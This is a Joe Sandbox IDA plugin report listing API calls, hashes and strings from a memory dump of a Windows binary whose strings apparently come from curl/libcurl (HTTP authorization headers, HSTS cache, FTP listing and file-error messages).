                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_mbschr_strdup$_mbsnbcpymalloc
                                        • String ID:
                                        • API String ID: 103568399-0
                                        • Opcode ID: a9c8f2f688d8bc8c63c5013b48087470967afd86c17b8bce3a1951d9fb60e69f
                                        • Instruction ID: a9d8efb006501275c17cccd49522a768db0ab80f3576c9db069e664b515c2284
                                        • Opcode Fuzzy Hash: a9c8f2f688d8bc8c63c5013b48087470967afd86c17b8bce3a1951d9fb60e69f
                                        • Instruction Fuzzy Hash: 7A312732904A06EFCB195F68EC185AE7BF6EF84310B24807AF505DB651DF70C8419BD0
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 00100503
                                        • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 001005B7
                                        • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 001005C6
                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 00100673
                                        • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 001006EE
                                        Strings
                                        • Can't get the size of %s, xrefs: 001005CE
                                        • Can't open %s for writing, xrefs: 00100565
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _close$___from_strstr_to_strchr_fstat64_write
                                        • String ID: Can't get the size of %s$Can't open %s for writing
                                        • API String ID: 2085843339-3544860555
                                        • Opcode ID: f3f021fd29ed5c9240176cf3c5d979521e644b8146a5b3a2db50174b68f6485e
                                        • Instruction ID: f7f42e8de12f7e268a0e90d7d2dfcba262164c1d9e3a71934a364f11fb09b6ec
                                        • Opcode Fuzzy Hash: f3f021fd29ed5c9240176cf3c5d979521e644b8146a5b3a2db50174b68f6485e
                                        • Instruction Fuzzy Hash: 27617471E042049BDF29DFA8DD91BAD77A2AF8C310F284139EC49EB285EBB15D518B50
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00111E77
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00111E7F
                                        • _ValidateLocalCookies.LIBCMT ref: 00111F08
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00111F33
                                        • _ValidateLocalCookies.LIBCMT ref: 00111F88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm$csm
                                        • API String ID: 1170836740-3733052814
                                        • Opcode ID: ae2d8aafdd21da130af495a37a24acdcd1c86e458b431248bcda7637fa94a9a3
                                        • Instruction ID: 31921464b7fbb31bde62e29ae5d4478e94bca16b44736450f43a4fd53726d6d4
                                        • Opcode Fuzzy Hash: ae2d8aafdd21da130af495a37a24acdcd1c86e458b431248bcda7637fa94a9a3
                                        • Instruction Fuzzy Hash: DF51BF34A01209AFCF18DF68C844AEEBBB1AF59314F1481B9ED155B2A2C731DDD6CB91
                                        Strings
                                        • %s.%s.tmp, xrefs: 000E6583
                                        • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 000E65B9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%s.%s.tmp
                                        • API String ID: 0-2507297550
                                        • Opcode ID: 238356f5d7ae8aafa585d2f81e7684c75a785ed2f7229ee1cd44d4f76baaaa26
                                        • Instruction ID: c6c35a01ea566ed184045fc4e5c4c86ced94e6e68c2b291166975770db875597
                                        • Opcode Fuzzy Hash: 238356f5d7ae8aafa585d2f81e7684c75a785ed2f7229ee1cd44d4f76baaaa26
                                        • Instruction Fuzzy Hash: 9741C332E006559FDF248F55E841AEEB7F5EF687A0F24402AEC01B7281DB71AD418BA0
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E13E6
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E142F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000E149A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000E14DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$___from_strstr_to_strchr
                                        • String ID: %.*s$%sAuthorization: Digest %s$Proxy-
                                        • API String ID: 622630536-541442569
                                        • Opcode ID: 3d22c99da81116ab7d10d324c1a284a85b2c564f7ffb2a073d070af66a86ea02
                                        • Instruction ID: 3f31bf2b1225cadb3baa2944450860d9952ce0e905437c2303068f7cb6b50c90
                                        • Opcode Fuzzy Hash: 3d22c99da81116ab7d10d324c1a284a85b2c564f7ffb2a073d070af66a86ea02
                                        • Instruction Fuzzy Hash: 99414C71A0425AAFDB14DFA9D840AEEBBF5EF48310F10806AE815E7392D7709941CBA1
                                        APIs
                                        • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00118C2C), ref: 000C505C
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C5070
                                        • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,00118C2C), ref: 000C5097
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,00118C2C), ref: 000C50A2
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C512B
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C513C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdup$mallocstrcspnstrncpystrpbrk
                                        • String ID: pkcs11:
                                        • API String ID: 1722728043-2446828420
                                        • Opcode ID: 97b414a47f5456b10dfd0a76fc5eb9fd7e09961259a2ea8bce6c543e7e5be0de
                                        • Instruction ID: 322f58066e5b678fb798992bfe909b5580b4f852fe7b8fe640d9e29ffadd97dc
                                        • Opcode Fuzzy Hash: 97b414a47f5456b10dfd0a76fc5eb9fd7e09961259a2ea8bce6c543e7e5be0de
                                        • Instruction Fuzzy Hash: 86411438204A819BDB364B28DC94BAE7FE59F97352F2C409DD8858B382D7B05CC2C761
                                        APIs
                                        • htons.WS2_32(?), ref: 000FF47D
                                        • htons.WS2_32(?), ref: 000FF491
                                        • send.WS2_32(?,?,00000003,00000000), ref: 000FF51A
                                        • WSAGetLastError.WS2_32(?,00000001), ref: 000FF524
                                        • send.WS2_32(?,?,00000002,00000000), ref: 000FF55A
                                        • WSAGetLastError.WS2_32(?,00000001), ref: 000FF564
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLasthtonssend
                                        • String ID: Sending data failed (%d)
                                        • API String ID: 2027122571-2319402659
                                        • Opcode ID: 74dd0202b010ce13a87a00af7b813c6717a868031b369e1ac8e4dfb162676f50
                                        • Instruction ID: 8a567e524e0c02c5d6d2b860cd4c91066afc32f30408401c4bfc4625be5c848f
                                        • Opcode Fuzzy Hash: 74dd0202b010ce13a87a00af7b813c6717a868031b369e1ac8e4dfb162676f50
                                        • Instruction Fuzzy Hash: 8841E771248255DFD7129F68C885DBD77E5EF29720F2409A9FAC2CB292D730A841CBA0
                                        APIs
                                          • Part of subcall function 000C3857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 000C3872
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000D5198
                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A,?,00000000,00000000,?,?,?,?,?,?,000D5B5D,00000000), ref: 000D51D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr__stdio_common_vsscanfstrtol
                                        • String ID: %*[^]]%c%n$%ld$[%*45[0123456789abcdefABCDEF:.]%c%n$]$][
                                        • API String ID: 1045171823-685413583
                                        • Opcode ID: 8b4b0505f6c47773f4bb5405dd998f90e865c3852135a9cab1125d0c74b6c2f6
                                        • Instruction ID: 3148da2ae724f29bfb04617c0ffde2ce6f4def8ad2e269bad16c51c226a6a0c5
                                        • Opcode Fuzzy Hash: 8b4b0505f6c47773f4bb5405dd998f90e865c3852135a9cab1125d0c74b6c2f6
                                        • Instruction Fuzzy Hash: 15314635E00719BEEB308B689C41BFE7BEC9F16701F24006BEC45E7382D6609D8586B1
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C781F
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000C7833
                                        • strtok.API-MS-WIN-CRT-STRING-L1-1-0(?,00118E74), ref: 000C786E
                                        • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00118E74), ref: 000C78A2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C78B7
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C78CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: strtok$__acrt_iob_funcfclosefopenfree
                                        • String ID: p
                                        • API String ID: 896044852-2181537457
                                        • Opcode ID: 77f364d97d9f7f094c0219c38a468f12b9cc1450d7d34538b9bdf7f061849ecc
                                        • Instruction ID: c583043a6fd51aeb35f6d4f99fe043764fb157286b178a71169bc63cd1dee1ff
                                        • Opcode Fuzzy Hash: 77f364d97d9f7f094c0219c38a468f12b9cc1450d7d34538b9bdf7f061849ecc
                                        • Instruction Fuzzy Hash: BF31D43560C7429FC359CB348898FAE77E5BB95354F64892DF19A83281EF70D849CB11
                                        APIs
                                        • _strrchr.LIBCMT ref: 000FB2B9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000FB2E3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?), ref: 000FB33A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?), ref: 000FB372
                                          • Part of subcall function 000D2813: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D2848
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strrchrmalloc
                                        • String ID: %s%s%s$LIST$NLST
                                        • API String ID: 685622329-959297966
                                        • Opcode ID: 44564e5cd6a5474dcf82a39a14ede7ff082c21c2d2a12691f575eaed3c3948d6
                                        • Instruction ID: efe1b1e34b9678ac43f076b1fe15aed4dd718ffa01e8d34583e288dd57dbc939
                                        • Opcode Fuzzy Hash: 44564e5cd6a5474dcf82a39a14ede7ff082c21c2d2a12691f575eaed3c3948d6
                                        • Instruction Fuzzy Hash: 87310932701619AFDB189B68DC817BE77E9EF44354F10803EE901E7681D7709D419B91
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strrchr$free
                                        • String ID: %s%s$%s/%s$://
                                        • API String ID: 3904173637-3147304931
                                        • Opcode ID: cae19ccf340f537edef552abad25b3b590fc811c918f60f58e0f48bce26ffa86
                                        • Instruction ID: 671b11659e511ba677860474e294c8a767f8f76b27f58af5c2e45d99419fdc60
                                        • Opcode Fuzzy Hash: cae19ccf340f537edef552abad25b3b590fc811c918f60f58e0f48bce26ffa86
                                        • Instruction Fuzzy Hash: E121F532F04321BBDB2967A95851FAEA6E4DB54760F28007FFD05A7282EB71CD428294
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3B75
                                        • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 000C3B83
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3B8C
                                        • ferror.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3B96
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000C3BA6
                                        • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 000C3BAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_func$_errnoferrorfreadstrerror
                                        • String ID: stdin: %s
                                        • API String ID: 2463866935-3123201360
                                        • Opcode ID: f5835e8f10f88ae15169ffa3dc3515a936c5dcc96a9aedbf0e45331ac743c8a6
                                        • Instruction ID: be7f6d62940dc14db08de8f3cb0463d76cea45713066998dae19c97597c37691
                                        • Opcode Fuzzy Hash: f5835e8f10f88ae15169ffa3dc3515a936c5dcc96a9aedbf0e45331ac743c8a6
                                        • Instruction Fuzzy Hash: 8F21D032520B41DFCB648F29DD85EAFB3F9FB84761754842EFA0282912D771EE408A14
                                        APIs
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA1AB
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1B3
                                          • Part of subcall function 000DA01F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 000DA058
                                          • Part of subcall function 000DA01F: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?), ref: 000DA06F
                                          • Part of subcall function 000DA01F: ___from_strstr_to_strchr.LIBCMT ref: 000DA087
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1E9
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1F6
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA1FE
                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA209
                                        Strings
                                        • Unknown error %u (0x%08X), xrefs: 000DA1D6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$FormatMessage___from_strstr_to_strchrwcstombs
                                        • String ID: Unknown error %u (0x%08X)
                                        • API String ID: 1622130791-1058733786
                                        • Opcode ID: d33ff7a2d276368eb84ad3d199c7401a3e740ad46d1ca9576478631c68b2e9c6
                                        • Instruction ID: d8f7643f0562187cbe82612b1af846c4e2702deb1adad75ec106acc3c9c829ef
                                        • Opcode Fuzzy Hash: d33ff7a2d276368eb84ad3d199c7401a3e740ad46d1ca9576478631c68b2e9c6
                                        • Instruction Fuzzy Hash: FAF08131700B00FFC3155BA99D49A9EBEEAAFDA791F504056F501D7361EBB08D80CA71
                                        APIs
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,000C2BF3), ref: 000C2A4D
                                        Strings
                                        • No space left on the file system that will contain the directory %s., xrefs: 000C2A8D, 000C2A9A
                                        • You don't have permission to create %s., xrefs: 000C2A94
                                        • Cannot create directory %s because you exceeded your quota., xrefs: 000C2A78
                                        • The directory name %s is too long., xrefs: 000C2A7F
                                        • %s resides on a read-only file system., xrefs: 000C2A86
                                        • Error creating directory %s., xrefs: 000C2A71
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errno
                                        • String ID: %s resides on a read-only file system.$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
                                        • API String ID: 2918714741-798752981
                                        • Opcode ID: 994581c3ebc359e7414035cc0d4b3182ceaac99b3ddf23f0741318cc60e318f2
                                        • Instruction ID: 188cd8f920086085e96996b0c5ef26b9c275803e41e8729b901e8c308e3784df
                                        • Opcode Fuzzy Hash: 994581c3ebc359e7414035cc0d4b3182ceaac99b3ddf23f0741318cc60e318f2
                                        • Instruction Fuzzy Hash: 37F0A062208103E7427DA7BF660CEBE4AA4D792392314073FF005E6FA4D664CCC6A21B
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000F0B5D,?,?,00000001), ref: 00100E63
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,000F0B5D,?,?,00000001), ref: 00100ECE
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,000F0B5D,?,?,00000001), ref: 00100F09
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?,?,000F0B5D,?,?,00000001), ref: 00100F86
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,000F0B5D,?,?,00000001), ref: 00100FC1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-
                                        • API String ID: 1294909896-3667642693
                                        • Opcode ID: c3c9c73957632532312dc8aaeacea53c5328d0cc65898ccf638512c2c38c1d61
                                        • Instruction ID: 61bd0e4f4c2a466098a04649f7e589e540170aa6cc25850e0a9ac56c54d80f42
                                        • Opcode Fuzzy Hash: c3c9c73957632532312dc8aaeacea53c5328d0cc65898ccf638512c2c38c1d61
                                        • Instruction Fuzzy Hash: 0A914970A0420AEFDB15DFA8D880AADBBF5FF48314F10406AE855E7391DBB1AD51CB91
                                        APIs
                                          • Part of subcall function 001067EE: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000F0591,00000001,00000000,00000000,00000000,?,?,?), ref: 00106847
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,000F0D79,?), ref: 00102E88
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,000F0D79,?), ref: 00102EAD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,000F0D79,?), ref: 00102ECD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00102F34
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
                                        • API String ID: 2190258309-1255959952
                                        • Opcode ID: bd59f6ed4ac186be90d57b397c0f8a6e85c80d73a65cf3a11ec690d4e989e328
                                        • Instruction ID: 909544061d9fab418eb04a02fbdb43c81c1e2291c381fc67922a6de13352c416
                                        • Opcode Fuzzy Hash: bd59f6ed4ac186be90d57b397c0f8a6e85c80d73a65cf3a11ec690d4e989e328
                                        • Instruction Fuzzy Hash: 20710030B44206DFDB198B58C854BA97BF5EF45384F1980BEE8819B2D2EBB4DD80CB51
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,000C1773), ref: 000C18D7
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000C190C
                                        • _strrchr.LIBCMT ref: 000C191C
                                        • _strrchr.LIBCMT ref: 000C1931
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,000C1773), ref: 000C1944
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000C1955
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000C1965
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,000C1773), ref: 000C19A0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
